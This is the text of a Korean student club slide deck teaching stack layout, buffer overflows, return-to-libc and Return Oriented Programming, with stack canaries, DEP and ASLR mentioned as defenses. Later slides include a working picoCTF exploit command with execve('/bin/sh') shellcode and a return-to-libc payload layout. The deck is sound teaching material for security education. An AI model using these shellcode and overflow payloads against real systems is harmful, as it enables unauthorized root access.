Return Oriented Programming

1. ROP Return Oriented Programming HeXA

2. 발표자 소개 김동민 - HeXA 5기 - HeXA 회장, 해킹부장 - UNIST 15학번 http://github.com/rocky112358 rocky112358@gmail.com http://fb.com/rocky112358

3. $면 좋고 #이면 더 좋고

4. 시스템 해킹? 시스템에 접근해 해킹하는 것

5. 시스템 해킹? 시스템에 접근해 해킹하는 것 = 취약점을 찾아내서 루트 권한을 얻는 것

6. rocky112358@HeXA:~$ user 시스템 해킹? 시스템에 접근해 해킹하는 것 = 취약점을 찾아내서 루트 권한을 얻는 것

7. rocky112358@HeXA:~$ user root@HeXA:~# system admin 시스템 해킹? 시스템에 접근해 해킹하는 것 = 취약점을 찾아내서 루트 권한을 얻는 것

8. rocky112358@HeXA:~$ user root@HeXA:~# system admin 시스템 해킹? 시스템에 접근해 해킹하는 것 = 취약점을 찾아내서 루트 권한을 얻는 것 system(“/bin/sh”) execl(“/bin/sh”)

9. rocky112358@HeXA:~$ user root@HeXA:~# system admin 시스템 해킹? 시스템에 접근해 해킹하는 것 = 취약점을 찾아내서 루트 권한을 얻는 것 system(“/bin/sh”) execl(“/bin/sh”) $ $

10. rocky112358@HeXA:~$ user root@HeXA:~# system admin 시스템 해킹? 시스템에 접근해 해킹하는 것 = 취약점을 찾아내서 루트 권한을 얻는 것 system(“/bin/sh”) execl(“/bin/sh”) $ $ # #

11. 시스템 해킹! Stack Corruption Return to Library Format String Attack Return Oriented Programming

15. < EBP, ESPEBPEBP - 00x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

16. EBP < EBPEBP - 0 EBP - 4 EBP - 8 < ESP 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

17. EBP < EBPEBP - 0 EBP - 4 EBP - 8 < ESP 1 2 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

18. EBP < EBPEBP - 0 EBP - 4 EBP - 8 < ESP 1 2 0x0804a0b0 EAX 0x0804a0a8 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

19. EBP < EBPEBP - 0 EBP - 4 EBP - 8 1 2 2EBP - 12 0x0804a0b0 < ESP EAX 0x0804a0a8 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

20. EBP < EBPEBP - 0 EBP - 4 EBP - 8 1 2 2EBP - 12 0x0804a0b0 < ESP EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

21. EBP < EBPEBP - 0 EBP - 4 EBP - 8 1 2 2 1 EBP - 12 EBP - 16 0x0804a0b0 < ESP EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

22. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 < EBPEBP - 0 EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12)0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

23. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 < EBPEBP - 0 EBP + 4 EBP + 8 EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) EBP + 12 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

24. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) EBP + 12 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

25. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

26. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 < ESP 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

27. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 < ESP 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

28. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 1 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

29. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 1 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 Stack

30. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 Stack

34. EBP < EBPEBP - 0 EBP - 4 EBP - 8 < ESP 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

35. EBP < EBPEBP - 0 EBP - 4 EBP - 8 < ESP 1 2 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

36. EBP < EBPEBP - 0 EBP - 4 EBP - 8 < ESP 1 2 0x0804a0b0 EAX 0x0804a0a8 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

37. EBP < EBPEBP - 0 EBP - 4 EBP - 8 1 2 2EBP - 12 0x0804a0b0 < ESP EAX 0x0804a0a8 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

38. EBP < EBPEBP - 0 EBP - 4 EBP - 8 1 2 2EBP - 12 0x0804a0b0 < ESP EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

39. EBP < EBPEBP - 0 EBP - 4 EBP - 8 1 2 2 1 EBP - 12 EBP - 16 0x0804a0b0 < ESP EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

40. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 < EBPEBP - 0 EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12)0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

41. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 < EBPEBP - 0 EBP + 4 EBP + 8 EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) EBP + 12 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

42. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 EAX 0x0804a0a8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) EBP + 12 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

43. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

44. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 ECX 0x0804a0ac 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 < ESP 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

45. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 < ESP 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

46. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP EAX 0x0804a0a4 saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 1 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 Stack

47. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 1 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 Stack

48. EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 EBP + 4 EBP + 8 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) EBP + 12 ECX 0x0804a0a0 2 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 Stack

49. EBP + 4 EBP + 8 EBP + 12 EBP 1 2 2 1 0x0804a0b0 0x0804a0b0EBP - 0 0x0804a0ac 0x0804a0a8 EBP - 4 EBP - 8 0x0804a0a4 0x0804a0a0 < EBP saved EIP (12) ECX 0x0804a0a0 2 < ESP 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 Stack

50. EBP - 12 EBP - 16 EBP - 20 EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 < EBP < ESP EBP - 0 EBP - 4 EBP - 8 Stack

51. EBP - 12 EBP - 16 EBP - 20 EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 < EBPEBP - 0 EBP - 4 EBP - 8 < ESP Stack

52. EBP - 12 EBP - 16 EBP - 20 EBP 1 2 2 1 0x0804a0b0 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 < EBPEBP - 0 EBP - 4 EBP - 8 < ESP Stack

53. EBP - 12 EBP - 16 EBP - 20 EBP 1 2 1 0x0804a0b0 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 < EBPEBP - 0 EBP - 4 EBP - 8 < ESP “%dn” Stack

54. EBP - 12 EBP - 16 EBP - 20 EBP 1 2 0x0804a0b0 0x0804a0b0 0x0804a0ac 0x0804a0a8 0x0804a0a4 0x0804a0a0 saved EIP (12) ECX 0x0804a0a0 2 0x0804a09c 0x0804a098 0x0804a094 0x0804a090 EAX 0x0804a090 3 < EBPEBP - 0 EBP - 4 EBP - 8 < ESP “%dn” call printf Stack

55. Stack 지역 변수 함수 파라미터 리턴 값 다음에 실행될 명령의 위치 저장된 EBP …

56. • https://picoctf.com/problem- static/binary/Overflow1/overflow1.html Example

57. Blocked! Canary 이미지 출처: http://www.jones-seed.com/wp- content/uploads/2014/11/CanariesOnBranches.png

58. Return Oriented Programming

59. Gadget 이미지 출처 : http://cfile7.uf.tistory.com/image/236F684151F6600107BA70

60. Gadget https://github.com/JonathanSalwan/ROPgadget/tree/master http://ropshell.com/ropsearch?h=5d63b69dccbd0d46bcf3e559bf79b4a7 0x01010101 0x02020202 0x03030303 0x04040404

61. Chaining Gadget https://github.com/JonathanSalwan/ROPgadget/tree/master http://ropshell.com/ropsearch?h=5d63b69dccbd0d46bcf3e559bf79b4a7 0x01010101 0x02020202 0x03030303 0x04040404

62. Chaining Gadget https://github.com/JonathanSalwan/ROPgadget/tree/master http://ropshell.com/ropsearch?h=5d63b69dccbd0d46bcf3e559bf79b4a7 0x01010101 0x02020202 0x03030303 0x04040404 0x02020202 0x04040404 0x01010101 0x03030303 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 … Stack < ESP

63. Chaining Gadget https://github.com/JonathanSalwan/ROPgadget/tree/master http://ropshell.com/ropsearch?h=5d63b69dccbd0d46bcf3e559bf79b4a7 0x01010101 0x02020202 0x03030303 0x04040404 0x02020202 0x04040404 0x01010101 0x03030303 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 … Stack < ESP EIP 0x02020202

64. Chaining Gadget https://github.com/JonathanSalwan/ROPgadget/tree/master http://ropshell.com/ropsearch?h=5d63b69dccbd0d46bcf3e559bf79b4a7 0x01010101 0x02020202 0x03030303 0x04040404 0x02020202 0x04040404 0x01010101 0x03030303 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 … Stack < ESP < EIP EIP 0x02020202

74. Chaining Gadget https://github.com/JonathanSalwan/ROPgadget/tree/master http://ropshell.com/ropsearch?h=5d63b69dccbd0d46bcf3e559bf79b4a7 0x01010101 0x02020202 0x03030303 0x04040404 0x02020202 0x04040404 0x01010101 0x03030303 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 … Stack < ESP < EIP exit(0) EIP 0x03030303

75. argv[1] A*20 Return to libc < EBP

76. Saved EBP Saved EIP … … argv[1] A*20 Return to libc < EBP

77. AAAA AAAA AAAA AAAA AAAA Saved EBP Saved EIP … … argv[1] A*20 Return to libc < EBP

78. AAAA AAAA AAAA AAAA AAAA Saved EBP Saved EIP … … AAAA AAAAargv[1] A*28 Return to libc < EBP

79. AAAA AAAA AAAA AAAA AAAA Saved EBP Saved EIP … … AAAA AAAAargv[1] A*28 Return to libc system(“/bin/sh”); < EBP

80. AAAA AAAA AAAA AAAA AAAA Saved EBP Saved EIP … … AAAA &system() AAAA &“/bin/sh” Return to libc argv[1] A*24 + &system() + “AAAA” + &”/bin/sh” system(“/bin/sh”); < EBP

81. AAAA AAAA AAAA AAAA AAAA Saved EBP Saved EIP … … AAAA &system() AAAA &“/bin/sh” Return to libc argv[1] A*24 + &system() + “AAAA” + &”/bin/sh” system(“/bin/sh”); < EBP < EBP+8

82. AAAA AAAA AAAA AAAA AAAA Saved EBP Saved EIP … … AAAA &system() AAAA &“/bin/sh” Return to libc argv[1] A*24 + &system() + “AAAA” + &”/bin/sh” system(“/bin/sh”);$ < EBP < EBP+8

83. &system()? &“/bin/sh”? ./env SHELL

84. https://picoctf.com/problems - ROP1 EAX Example A*76 Saved EIP

85. https://picoctf.com/problems - ROP1 EAX Example ./rop1 $(python -c 'print "x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80" + "A"*55 + "x86x8dx04x08" ' ) A*76 Saved EIP

86. https://picoctf.com/problems - ROP1 EAX Example ./rop1 $(python -c 'print "x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80" + "A"*55 + "x86x8dx04x08" ' ) A*76 Saved EIP

87. https://picoctf.com/problems - ROP1 EAX execve(“/bin/sh”) Example ./rop1 $(python -c 'print "x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80" + "A"*55 + "x86x8dx04x08" ' ) A*76 Saved EIP

88. https://picoctf.com/problems - ROP1 EAX execve(“/bin/sh”) Example ./rop1 $(python -c 'print "x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80" + "A"*55 + "x86x8dx04x08" ' ) A*76 Saved EIPShellcode A*55 0x08048d86

89. https://picoctf.com/problems - ROP1 EAX execve(“/bin/sh”) $ Example ./rop1 $(python -c 'print "x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80" + "A"*55 + "x86x8dx04x08" ' ) A*76 Saved EIPShellcode A*55 0x08048d86

90. Defense...! DEP Data Execution Prevention

91. Defense...! ASLR Address space layout randomization

92. 참고 사이트 http://shayete.tistory.com/entry/1-시스템-해킹이란-linux-기초명령어-vim-명령어-사용법 https://www.exploit-db.com/docs/28553.pdf http://shayete.tistory.com/entry/4-Return-to-Library-RTL 감사합니다.

Return Oriented Programming

Recommended

Recommended

More Related Content

Similar to Return Oriented Programming

Similar to Return Oriented Programming (11)

Recently uploaded

Recently uploaded (20)

Return Oriented Programming